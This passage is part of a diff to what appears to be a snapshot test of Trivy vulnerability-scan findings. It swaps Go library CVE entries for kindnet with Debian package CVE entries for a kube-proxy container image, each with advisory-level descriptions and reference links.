"https://rwc.iacr.org/2020/slides/Leurent.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://ubuntu.com/security/notices/USN-4516-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://usn.ubuntu.com/4516-1/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-14855", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3219", + "installedVersion": "2.2.12-1+deb10u1", + "packageName": "gpgv", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-3219", + "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", + "https://dev.gnupg.org/D556", + "https://dev.gnupg.org/T5993", + "https://marc.info/?l=oss-security&m=165696590211434&w=4", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", + "https://security.netapp.com/advisory/ntap-20230324-0001/", + "https://www.cve.org/CVERecord?id=CVE-2022-3219", + ], + }, + "category": "Vulnerability", + "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "denial of service issue (resource consumption) using compressed packets", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://avd.aquasec.com/nvd/cve-2022-3219", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://access.redhat.com/security/cve/CVE-2022-3219", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://dev.gnupg.org/D556", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://dev.gnupg.org/T5993", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://marc.info/?l=oss-security&m=165696590211434&w=4", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://security.netapp.com/advisory/ntap-20230324-0001/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3219", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.9-3+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1271", + "installedVersion": "1.9-3", + "packageName": "gzip", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:4940", + "https://access.redhat.com/security/cve/CVE-2022-1271", + "https://bugzilla.redhat.com/2073310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "https://errata.rockylinux.org/RLSA-2022:4940", + "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "https://linux.oracle.com/cve/CVE-2022-1271.html", + "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "https://security.gentoo.org/glsa/202209-01", + "https://security.netapp.com/advisory/ntap-20220930-0006/", + "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "https://ubuntu.com/security/notices/USN-5378-1", + "https://ubuntu.com/security/notices/USN-5378-2", + "https://ubuntu.com/security/notices/USN-5378-3", + "https://ubuntu.com/security/notices/USN-5378-4", + "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "https://www.openwall.com/lists/oss-security/2022/04/07/8", + ], + }, + "category": "Vulnerability", + "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "arbitrary-file-write vulnerability", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://avd.aquasec.com/nvd/cve-2022-1271", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://access.redhat.com/errata/RHSA-2022:4940", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-1271", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://bugzilla.redhat.com/2073310", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://errata.rockylinux.org/RLSA-2022:4940", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://security.gentoo.org/glsa/202209-01", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://ubuntu.com/security/notices/USN-5378-1", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://ubuntu.com/security/notices/USN-5378-2", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://ubuntu.com/security/notices/USN-5378-3", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://ubuntu.com/security/notices/USN-5378-4", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20220127200216-cd36cc0744dd", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "iptables", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "iptables: --syn flag bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - }, - { - "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-11360", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "iptables", + "references": [ + "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "https://access.redhat.com/security/cve/CVE-2019-11360", + "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "https://www.cve.org/CVERecord?id=CVE-2019-11360", + ], + }, + "category": "Vulnerability", + "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "iptables: buffer overflow in iptables-restore", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://avd.aquasec.com/nvd/cve-2019-11360", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://access.redhat.com/security/cve/CVE-2019-11360", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20220127200216-cd36cc0744dd", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3374", + "installedVersion": "1.8.2.2", + "packageName": "libapt-pkg5.0", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "https://access.redhat.com/security/cve/cve-2011-3374", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "https://seclists.org/fulldisclosure/2011/Sep/221", + "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "https://ubuntu.com/security/CVE-2011-3374", ], }, "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://avd.aquasec.com/nvd/cve-2011-3374", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://access.redhat.com/security/cve/cve-2011-3374", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://seclists.org/fulldisclosure/2011/Sep/221", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://ubuntu.com/security/CVE-2011-3374", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.0.6-9.2~deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3112-1", + "installedVersion": "1.0.6-9.2~deb10u1", + "packageName": "libbz2-1.0", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "bzip2 - bugfix update", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33574", + "installedVersion": "2.28-10", + "packageName": "libc-bin", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-33574", + "https://linux.oracle.com/cve/CVE-2021-33574.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210629-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + "https://www.cve.org/CVERecord?id=CVE-2021-33574", + ], + }, + "category": "Vulnerability", + "description": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: mq_notify does not handle separately allocated thread attributes", + "references": [ { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://avd.aquasec.com/nvd/cve-2021-33574", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://access.redhat.com/security/cve/CVE-2021-33574", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://linux.oracle.com/cve/CVE-2021-33574.html", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://security.netapp.com/advisory/ntap-20210629-0005/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33574", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20220209214540-3681064d5158", - "packageName": "golang.org/x/sys", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-35942", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", + "https://access.redhat.com/security/cve/CVE-2021-35942", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", + "https://linux.oracle.com/cve/CVE-2021-35942.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", + "https://security.gentoo.org/glsa/202208-24", + "https://security.netapp.com/advisory/ntap-20210827-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", + "https://sourceware.org/glibc/wiki/Security%20Exceptions", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5699-1", + "https://www.cve.org/CVERecord?id=CVE-2021-35942", ], }, "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "faccessat checks wrong group", + "name": "glibc: Arbitrary read in wordexp()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - }, - { - "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - }, - { - "type": "URL", - "value": "https://github.com/golang/go/issues/52313", - }, - { - "type": "URL", - "value": "https://go.dev/cl/399539", - }, - { - "type": "URL", - "value": "https://go.dev/cl/400074", + "value": "https://avd.aquasec.com/nvd/cve-2021-35942", }, { "type": "URL", - "value": "https://go.dev/issue/52313", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://access.redhat.com/security/cve/CVE-2021-35942", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://linux.oracle.com/cve/CVE-2021-35942.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://security.netapp.com/advisory/ntap-20210827-0005/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": 